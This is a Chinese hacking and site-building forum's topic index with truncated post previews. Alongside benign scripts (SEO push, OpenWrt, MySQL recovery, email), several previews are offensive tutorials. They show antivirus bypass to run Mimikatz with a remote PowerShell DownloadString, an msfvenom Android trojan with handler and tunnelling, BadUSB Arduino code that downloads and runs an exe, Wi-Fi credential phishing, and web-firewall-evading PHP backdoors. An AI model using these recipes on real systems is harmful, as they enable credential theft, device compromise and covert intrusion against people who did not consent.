建站VPS工具综合杂谈
网站建设、网络程序源码、IPS Invision Community、Xenforo、WordPress等其它源码系统程序交流,包括VPS推荐、服务器建站技术讨论等话题。
365个主题在此版面
-
什么是蜜罐蜜罐 技术本质上是一种对攻击方进行 欺骗的技术,通过布置一些作为 诱饵的主机、网络服务 或者 信息,诱使攻击方对它们实施攻击,从而可以对攻击行为进行 捕获 和 分析,了解攻击方所使用的工具与方法,推测攻击意图和动机,能够让防御方清晰地了解他们所面对的安全威胁,并通过技术和管理手段来增强实际系统的安全防护能力。 蜜罐 好比是 情报收集系统。蜜罐好像是故意让人攻击的目标,引诱黑客前来攻击。所以攻击者入侵后,你就可以知道他是如何得逞的,随时了解针对服务器发动的最新的攻击和漏洞。还可以通过窃听黑客之间的联系,收集黑客所用的种种工具,并且掌握他们的社交网络 系统介绍HFish 是一款基于 Golang 开发的跨平台多功能主动诱导型开源蜜罐框架系统,为了企业安全防护做出了精心的打造,全程记录黑客攻击手段,实现防护自主化。 多功能 不仅仅支持HTTP(S) 蜜罐,还支持SSH、SFTP、Redis、Mysql、FTP、Telnet、暗网 等扩展性 提供API 接口,使用者可以随意扩展蜜罐模块 (WEB、PC、APP )便捷性 使用Golang +SQLite 开发,使用者可以在Win +Mac +Linux 上快速部署一套蜜罐平台安装浏览器打开 https://github.com/hacklcx/HFish/releases下载相对应版本。 tar -zxvf fish-0.2-linux-amd64.tar.gz #名字是下载的压缩包,根据实际情况修改 cd hfish-0.2-linux-amd64 …
-
- 0 篇回复
- 19 次查看
-
-
博客主要是以 佛系更新为主,百度收录惨淡就不提了。作为一名合格的博主,如何让百度爹地更好的收录呢?除了 sitemap 自动推送等方式外,还有那些方法呢? 流程图 python代码import re from time import sleep import requests try: with open(r'sitemap.xml', 'r', encoding='UTF-8') as f: a = f.read() p = re.compile(r'https://(.+)</loc>') r = p.findall(a) data = '\n'.join(r) url = f'http://data.zz.baidu.com/urls?site=你的域名&token=你的token' #记得修改成自己的网址和token a = requests.post(url, data=data) print(a.text) sleep(3) except FileNotFoundError: print('请将sitemap.xml和本程序放在同一目录下') sleep(3)登录百度站长中心,获取你自己的 token 命名为 seo.py名字可以自定义。 shell脚本#!/bin/ #进入到seo优化文件 cd /root/seo #下载远程site…
-
- 0 篇回复
- 19 次查看
-
-
我们生活中常见的都是一些比较常见的家庭的路由器。而我又喜欢动手DIY,可又苦于没有钱😂。想玩一些比较高级的东西只能望洋兴叹!!! 准备树莓派4bOpenwrt镜像(文末附下载链接)TF卡 读卡器 写入系统利用Win32DiskImager将下载下来的openwrt镜像写入TF卡。 启动将TF卡插入树莓派。通电即可! 登录用网线连接pc和树莓派,浏览器访问192.168.1.1看到登录页面,说明写入成功。 用户名:root 密码:password 其他的功能我就不再介绍,有需要的可以看看! 镜像下载镜像下载
-
- 0 篇回复
- 19 次查看
-
-
前言在学籍管理中,我们导出学籍后(姓名 学籍号 身份证号)等常用的信息。如何按照学籍信息和对应学生的照片进行命名呢?首先来看看效果 如上,假设我们根据学籍信息(由A-Z排序),拍摄学生照片。如何将excel中对应的学生姓名和学号与对应的学生匹配并重命名呢? 最终实现的效果 问题解决难点将excel中数据和图片一一对应是关键。故要求我们在拍摄照片时需按照学生姓名(由A-Z排序)进行拍摄。不然数据可能无法一一对应。 实现方案01对拍摄的所有文件批量重命名因为照相设备的不同,拷贝出来相片的命名方式是不同的。 如上,按照学生姓名(由A-Z排序)后,给学生拍照。 将所有图片进行批量重命名 import os class BatchRename(): def __init__(self): self.path = '/root/photo/photo1/' def rename(self): filelist = os.listdir(self.path) filelist.sort() total_num = len(filelist) i = 0 for item in filelist: if item.endswith('.jpg'): src = os.path.join(os.path.abspath(self.path), item) …
-
- 0 篇回复
- 19 次查看
-
-
Mysql是最常见的关系数据库,因开源和免费被广泛使用。如果当我们数据库误删后,在没有备份的情况下如何恢复数据库呢? Mysql8.0数据库恢复环境Windows LinuxMysql8.0.12PHP7.4Dzx3.4 故障描述有网友联系我,说自己的dz站不小心删库了!本地没有备份,已经运维了好几年了。看能不能恢复,在咨询后发现他用的小皮面板,很显然没有做好备份功能!在查阅一番后,知道了自Mysql8.0后,当用户创建了数据库后,会在MySQL8.0.12\data目录下产生相应的恢复文档,用于后期的恢复!当然Mysql之前的版本也有这个功能,但是文件格式变了! 文件说明XXX.sdi表结构文件XXX.MYD数据文件XXX.MYI索引文件我们可以利用这三个文件完成对数据库的恢复! 删库恢复测试1.我们首先创建一个数据库bbskali create database bbskali;2.创建数据表 并建立相应的字段 CREATE TABLE `bbskali`.`nbkali` ( `id` INT(255) NOT NULL , `name` CHAR(255) NOT NULL , `nmuber` INT(255) NOT NULL , `age` INT(255) NOT NULL ) ENGINE = MyISAM; 3.删除数据库 4.我们在date目录下可以看到刚才建立的数据库bbskali的文件夹,以及有关表的相关文件。 5.将文件复制出来,并新建数据库bbskali2和表nbkali(建立字段,不填数值。) 6.继续会…
-
- 0 篇回复
- 19 次查看
-
-
一:下载64位地址:https://github.com/oguzhaninan/S ... cer_1.0.9_amd64.deb 32位地址:https://github.com/oguzhaninan/S ... acer_1.0.6_i386.deb 二:安装下载后,将文件复制到kali 执行命令安装 dpkg -i stacer_1.0.9_amd64.deb三:运行终端命令 Stacer CPU监控
-
- 0 篇回复
- 18 次查看
-
-
介绍NIKTO:perl语言开发的开源WEB安全扫描器;识别网站软件版本;搜索存在安全隐患的文件;检查服务器配置漏洞;检查WEB Application层面的安全隐患;避免404误判依据响应文件内容判断,不同扩展名的文件404响应内容不同。命令列表root@kali:~#nikto -h Option host requires an argument -config+ Use this config file -Display+ Turn on/off display outputs -dbcheck check database and other key files for syntax errors -Format+ save file (-o) format -Help Extended help information -host+ target host -id+ Host authentication to use, format is id:pass or id:pass:realm -list-plugins List all available plugins -output+ Write …
-
- 0 篇回复
- 18 次查看
-
-
说明方法有哪些是一个百度网盘搜索工具,我们可以搜索很多网盘里的资源,就算是加密文件,有的也会自动获取密码,但不是全部都能获取到,总体来说还是很强大的。 截图 使用方法下载后打开,输入搜索内容后,搜索,双击列表将会自动打开该网盘链接,若有密码将自动复制密码,再将密码粘贴进去。
-
- 0 篇回复
- 18 次查看
-
-
临时修改IP ifconfig eno16777736 192.168.1.101 注意(eno16777736)是默认第一个网络接口名称 永久修改IP第一步:查看网络接口 ifconfig 第二步:去对应的网络接口配置文件修改配置,注意文件名称是(ifcfg-默认第一个网络接口名称),文件路径是/etc/sysconfig/network-scripts/ vim /etc/sysconfig/network-scripts/ifcfg-网络接口名称 修改以下配置 TYPE=Ethernet BOOTPROTO=static DEFROUTE=yes IPV4_FAILURE_FATAL=no IPV6INIT=yes IPV6_AUTOCONF=yes IPV6_DEFROUTE=yes IPV6_FAILURE_FATAL=no NAME=eno16777736 UUID=9e8d604f-d991-4aa2-88a3-4c679e6f139c DEVICE=eno16777736 ONBOOT=yes PEERDNS=yes PEERROUTES=yes IPV6_PEERDNS=yes IPV6_PEERROUTES=yes HWADDR=00:0c:29:ce:3f:3c #MAC地址 IPADDR=192.168.1.104 #静态IP GATEWAY=192.168.1.2 #默认网关 NETMASK=255.255.255.0 #子网掩码 DNS1=192.…
-
- 0 篇回复
- 18 次查看
-
-
漏洞分析在文件 WordPress/wp-admin/load-scripts.php 中: <?php ...//ignore $load = $_GET['load']; if ( is_array( $load ) ) { $load = implode( '', $load ); } $load = preg_replace( '/[^a-z0-9,_-]+/i', '', $load ); $load = array_unique( explode( ',', $load ) ); ...//ignore foreach ( $load as $handle ) { if ( ! array_key_exists( $handle, $wp_scripts->registered ) ) { continue; } $path = ABSPATH . $wp_scripts->registered[ $handle ]->src; $out .= get_file( $path ) . "\n"; } ...//ignore echo $out; exit;load-scripts.php 文件会根据load参数传入的文件名依次载入文件并输出。同时程序对load参数的内容进行了过滤,只有在白名单$wp_scripts中的JS文件才会被载入。 该JS文件白名单的内容在文件 WordPress/wp-includes/script-loader.php …
-
- 0 篇回复
- 18 次查看
-
-
前言平时收集的一些姿势,用户绕过杀软执行mimikatz,这里以360为例进行bypass 测试。 下载最新版360 http://static.mottoin.com/wp-content/uploads/2018/09/d3258c7db9baa979cb9101e4fba55286.png 未经处理的mimikatz直接就被杀了 :shock: http://static.mottoin.com/wp-content/uploads/2018/09/fe0e2e6b9de7931faeb49613caedb4c0.png 下面开始进行绕过360抓密码 姿势一-powershellhttps://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1cmd下执行 C:UserstestDesktop>powershell -exec bypass "import-module .Invoke-Mimikatz.ps1;Invoke-Mimikatz"也可以远程加载 powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.101/Invoke-Mimikatz.ps1');Invoke-Mimikatz但是powershell被360拦截 http://static.mottoin.com/wp-content/uplo…
-
- 0 篇回复
- 18 次查看
-
-
有时会遇到文件比较大,无法查阅,需要切割才行; 命令参数: split [选项] [要切割的文件] [输出文件名前缀] 1.首先查看文件大小 ls -lh //目标文件 android@split:~/home/split$ ls -lh 总用量 3.9G -rw-rw-r-- 1 android android 3.9G 1月 25 09:52 test.txt 2.切割,他会以a,b,c方式生成文件,小于500m的放到最后一个文件; //行数切割 split -l 100 test.txt //指定分割文件的大小为500M split -b 500m test.txt log_ 主要说一下指定分割文件的大小500m方式; android@split:~/home/split$ split -b 500m test.txt log_ //通过ls -lh查看,非常均匀; 总用量 7.7G -rw-rw-r-- 1 android android 500M 1月 25 18:20 log_aa -rw-rw-r-- 1 android android 500M 1月 25 18:20 log_ab -rw-rw-r-- 1 android android 500M 1月 25 18:20 log_ac -rw-rw-r-- 1 android android 500M 1月 25 18:20 log_ad -rw-rw-r-- 1 android android 500M 1月 25 18:20 log_ae -r…
-
- 0 篇回复
- 18 次查看
-
-
查询whois命令 whois www.targe.com 防火墙识别工具:wafw00f 使用: wafw00f targe.com 查看局域网中在线的设备工具:netdiscover 使用: netdiscover -i wlan0
-
- 0 篇回复
- 18 次查看
-
-
1.配置服务器的rewrite规则如果在保存上述配置的时候,typecho无法自动配置,那么你可能需要手动配置服务器的rewrite规则。 Linux Apache 环境 (.htaccess):<IfModule mod_rewrite.c> RewriteEngine On #下面是在根目录,文件夹要修改路径 RewriteBase / RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)$ /index.php/$1 [L] </IfModule>Linux Apache 环境(Nginx):location / { index index.html index.php; if (-f $request_filename/index.html) { rewrite (.*) $1/index.html break; } if (-f $request_filename/index.php) { rewrite (.*) $1/index.php; } if (!-f $request_filename) { rewrite (.*) /index.php; } }Windows IIS 伪静态 (httpd.ini):[ISAPI_Rewrite] #3600 = 1 hour CacheClockRate 3600 RepeatLimit 32 #中文tag解决 RewriteRu…
-
- 0 篇回复
- 18 次查看
-
-
#写在前面: 过狗相关的资料网上也是有很多,所以在我接下来的文章中,可能观点或者举例可能会与网上部分雷同,或者表述不够全面。 但是我只能说,我所传达给大家的信息,是我目前所掌握或者了解的,不能保证所有人都会有收获,但是个人水平有限,可能您觉得文章水平过低,或者并无太大营养。但是跳出文章本身,无论何种技术,重在交流,分享与总结。 另外,希望年轻人不要有太多戾气,更多的是需要保持一个谦逊态度对待技术,尤其是这个浮躁的安全界。 以上是我的开场白(没办法,这是我的一贯风格) 写php后门连载的目的。希望大家能够暂缓日站的脚步,静下心来想一想,我们在用菜刀做一些除(sang)暴(jin)安(tian)良(liang)的事的时候,php做了些什么,安全狗又蜷缩在门后目睹了些什么。 其实我更愿意传授安全之道,而非渗透之术。 参考过网上很多种已有的php后门的写法,总之思路各种奇葩与新奇,但是衡量一个优秀的php后门并不是单单的看代码多少,过狗怎么样,而是一种基于实际场景的一种变通,所以,php后门这是一门艺术。 连接后门时发生了什么所以当我在菜刀中双击连接的时候到底发生了什么,安全狗又是如何发现后门并拦截的? php后门原理很简单,当我们连接时,实际上我们会向php文件post数据,这个数据的内容为我们需要php去执行的代码,当php获取到数据并执行后,将返回一个response。 那么waf能够识别到什么层次?其实waf最多获取到tcp数据,也就是说,可以获取到我们所post的数据,与服务器所返回的数据,至于php执行命令的过程,用了什么对象,走了什…
-
- 0 篇回复
- 18 次查看
-
-
普通版在 kali中我们可以利用 msfvenom来生成一个Android木马。命令如下: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.232.195 LPORT=5555 R > TPLINK.apk这样便生成了一个名为 TPLINK.apk的Android木马。 然后我们配合 msfcosole进行攻击即可。 msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LPORT 5555 exploit手机端安装并执行,成功获得shell。 一些另外的玩法给手机播放视频和音频文件(需更新到最新版的msf)命令格式: paly /root/xxx.mp3 mp4 修改手机壁纸background use post/multi/manage/set_wallpaper sessions set sessions id set WALLPAPER_FILE JPG exploit晋级玩法利用 armitage图形化管理工具 可视化的文件管理 骨灰级外网木马我们可以利用花生壳进行端口映射完成外网木马的渗透测试,添加端口如下! 然后在kali中设置花生壳的端口和ip地址即可。 那么!你还有那些另类的玩法呢?一起在下方交流吧。 木马免杀对于以上的木马,是无法通过杀毒软件的查杀的,我们可以将 payload加入到正常的APP中,来起来免杀的效果。 命令:…
-
- 0 篇回复
- 18 次查看
-
-
准备badusbArduino 下载软件点击下载 运行软件 在工具菜单中 选择,选择badusb的端口和开发版。 注入代码windows10系统#include <Keyboard.h> void setup() { Keyboard.begin();//开始键盘通讯 delay(1000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(500); Keyboard.println("powershell -Command $clnt = new-object System.Net.WebClient;$url= 'https://bbskali.cn/8888.exe';$file = ' %HOMEPATH%\\windows.exe ';$clnt.DownloadFile($url,$file);%HOMEPATH%\\windows.exe;"); Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN); Keyboard.press(KEY_CAPS_LOCK); Keyboar…
-
- 0 篇回复
- 18 次查看
-
-
配置外网环境我这里用的是http://www.ngrok.cc其他的自行试用 这个可以免费 。 远程端口随便填(反正你填啥都会提示你端口已被使用:)) 本地端口填写你的kali ip地址 也就是攻击机的地址 端口随意 不懂4444即可! 填写完后效果如下: 然后点击开通 下载客户端根据你kali的版本下载 我的是64位的。 运行客户端先看看你的clientid 在隧道管理——隧道ip中查看,如图: 记录好id后,运行下面命令 ./sunny clientid 你的id 查看外网的ip我们ping下赠送域名的ip地址 得到ip地址 制作外网shellmsfvenom -p android/meterpreter/reverse_tcp LHOST=外网ip LPORT=外网端口 R > 666.apk**ps:**外网ip就是刚才ping出来的域名的ip地址,外网端口,就是你在添加隧道的时候,设置的端口。 生成之后,配置msf msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 内网ip set LPORT 内网端口 exploit填坑: 生成木马的时候,用的是外网ip和端口。配置msf的时候,我们用内网的ip和端口(很重要) 完成后,手机连接4G网络,运行木马。成功得到shell 看看手机的ip地址 [dplayer url="http://js.bbskali.cn/ji.flv" …
-
- 0 篇回复
- 18 次查看
-
-
题记当今社会,网络技术飞速发展。但是面临的信息安全问题越来越突出,信息泄露、个人的隐私被曝光、聊天记录被监听等等。通常我们会在各种平台上看到一些类似于阅后即焚效果的网站。很大程度上保护了我们的隐私,但是真真的是阅后即焚吗?比如 你发的朋友圈,在删除了这条朋友圈,你确定在服务器上真实删除了吗?结果就不为人知了? 利用kali安装阅后即焚,实现真正意义的保护个人隐私。 首先启动apacher 和mysql service apache2 start service mysql start由于kali是默认安装了apacher mysql php7.3我们就跳过具体的安装过程了! 配置mysql kali自带mysql配置 kali是自带mysql服务,今天我们来看看,如何配置mysql。启动myslqservice mysql sta... 根据上诉文章,配置好mysql的登录账号。登录mysql创建数据库!mysql -u root -p #登录数据库 create database yue; #创建了一个名为yue的数据库 show databases; #显示当前创建的数据库 复制源码下载源码 ,复制到/var/www/html 对文件进行解压 unzip PasteBurn.zip 将解压的文件复制到根目录 修改配置文件config.php 域名这里我们填写kali的ip地址 安装在浏览器中执行 http://kali ip/install.php即可完成安装! 但是,我们这样搭建后,只能通过内网设备…
-
- 0 篇回复
- 18 次查看
-
-
本文申明 本文的主旨是,让身边的人更加了解WiFi安全问题,而非而已的攻击他人。因本文具有一定的攻击行为,若您阅读后请务必准守国家相关网络安全法规。若由于您的行为造成他人损失的,责任自负。本站、本文不承担任何法律责任。若您同意请接着往下阅读,否则请您离开阅读其他文章。感谢支持!!! 原理示意图 设备清单树莓派(笔记本也可以)无线网卡(两个,只要kali支持的就行)钓鱼页面(文末下载) 拉取开源项目 git clone https://github.com/wifiphisher/wifiphisher.git cd wifiphisher sudo python setup.py install安装错误解决方案 在安装过程中,失败的最重要因素是网络问题,所以在安装过程中请保证网络良好。部分依赖下载失败,请挂乳酸菌或者更换国内的源。 钓鱼页面在文末下载钓鱼页面,放到wifiphisher/data/phishing-pages/oauth-login并替换。 在终端执行下面命令: wifiphisher --essid "FREE WI-FI" -p oauth-loginps: --essid :WiFi信号 视频演示 当用户输入账号等信息后,我们在后台即可得到账号和面。 附件下载 附件下载 解压密码: 查看文章隐藏内容或点我查看
-
- 0 篇回复
- 18 次查看
-
-
法律声明本文的宗旨是让更多的人了解身边的WiFi安全和WiFi安全爱好者学习研究,而非提供恶意教学。造成的法律后果请自行承担,与本站和作者无关。特此声明!!!!! 环境说明apache+php7.3+mysqlkali2019.43070无线网卡html页面 配置web服务器首先将整个站点上传到/var/www/html下。 配置config.php<?php $dbhost = 'localhost'; // mysql服务器主机地址 $dbuser = 'root'; // mysql用户名 $dbpass = 'root'; // mysql用户名密码 ?>注意: 在配置此文件之前,请先配置好你的数据库。数据库密码为你初始化设置的密码。 如果对数据库的配置有问题的,请参考文章 kali自带mysql配置 kali是自带mysql服务,今天我们来看看,如何配置mysql。启动myslqservice mysql sta... 安装站点首先我们启动apache和mysql service apache2 start service mysql start这里为了使安装成功,我们利用mysql -u root -p登录数据库,检测账号和密码的准确性。 在浏览器访问http://kali的ip/install.php 提示如下:证明安装成功! 如果提示下面错误: Connection failed: Access denied for user 'ro…
-
- 0 篇回复
- 18 次查看
-
-
使用SMTP发送邮件#-*- coding: UTF-8 -*- import smtplib from email.mime.text import MIMEText from email.header import Header msg_from = '[email protected]' #发送方邮箱 passwd = 'xxxx' #填入发送方邮箱的授权码(填入自己的授权码,相当于邮箱密码) msg_to = ['[email protected]'] #收件人邮箱 subject = "新年快乐!" #主题 content = "我是邮件的内容,祝你新年快乐。" msg = MIMEText(content) #放入邮件主题 msg['Subject'] = subject msg['From'] = msg_from try: #通过ssl方式发送,服务器地址,端口 s = smtplib.SMTP_SSL("smtp.163.com", 465) #登录到邮箱 s.login(msg_from, passwd) #发送邮件:发送方,收件方,要发送的消息 s.sendmail(msg_from, msg_to, msg.as_string()) print('成功') except s.SMTPException as e: print(e) finally: s.quit()效果如下
-
- 0 篇回复
- 18 次查看
-
-
ServerStatus-Toyo版是一个酷炫高逼格的云探针、云监控、服务器云监控、多服务器探针 该探针又服务器端和客户端两方面构成,服务端只安装一个,客户端需要在监控的VPS上面安装。 一、服务器端安装登录服务器,下载脚本。 附件下载 下载完成后,上传到服务器。 在终端执行 status.sh s 需要注意的是,由于网络环境的问题,安装过程可能会失败。多尝试几次即可!!! 1.2设置端口这里默认回车即可(35601)需要注意的是,需要在安全组中放行改端口。 1.3 配置web由于我们的服务器已经配置好了web环境,所以这里我们选择N 然后,我们到宝塔或者Apache中新建虚拟主机,并且解析到目录/usr/local/ServerStatus/web 如上,看到如上所示,证明我们的服务端就安装完成。 1.4 验证在浏览器中输入你刚才解析的域名或者ip地址,要是能够访问探针页面,则说明安装成功。 安装客户端登录需要被监控的服务器 下载一键安装脚本(同服务器端脚本) 客户端脚本 2.1安装客户端在终端执行 status.sh c 按1选择安装客户端 2.2 输入服务器端的IP,或者服务器端配置的域名这里的ip地址或者域名为你的服务端的ip或者域名,如果你的客户端和服务器在同一服务器。默认127.0.0.1即可。 2.3 输入端口默认即可(要和服务端的端口一样) 2.4 为本台服务器添加客户端用户名及密码 保存好刚才设置的账号和密码,后面再服务端添加节点的时候要用。 这样,我们的客户端就安装和配置完成了。现在我们返回到服务端添加节点即…
-
- 0 篇回复
- 18 次查看
-
-
SG11即SourceGuardian安全组件,目前是PHP运用中较为重要和安全级别较高的安全组件。有一部分系统默认状态下未安装或启用SG11,而有的开源系统需要开启sg11才能安装使用,本教程教你如何安装PHP7.1的SG11。 下载 SG11百度云盘下载 提取码:bx6y 确定你的php版本在终端输入php -v查看当前版本 如我的版本是7.1那么更具我们的系统,复制对应的sg文件。 我的是7.1则复制ixed.7.1.lin到我的更目录 这里我为了方便,直接放在了root目录下。 即:/root/sg11/ixed.7.1.lin 配置php.ini命令: vim /etc/php.ini在里面增加一条: extension=/root/sg11/ixed.7.1.lin保存后重启服务器即可! 验证我们利用php探针查看,要是有SourceGuardian则说明安装成功!
-
- 0 篇回复
- 18 次查看
-
-
首先做一次简单的分析,本次CTF共两关,第一关为图片隐藏,第二关为https的暴力破解。总奖金池金额为166元,摄影小狂人贝贝获得第一名,JUST RUN获得第二名。首先恭喜两位了! 首先来看看战绩吧 当然,小伙伴们都顺利拿到了奖金。其余小伙伴瓜分的奖金! 奖金公布 CTF writeup访问:http://106.13.39.165:66/ 开局一张图 本题考查的是图片隐写 解题方法参考摄影狂人小贝贝的方法(因为太懒,我没写 ) CTF解题思路
-
- 0 篇回复
- 18 次查看
-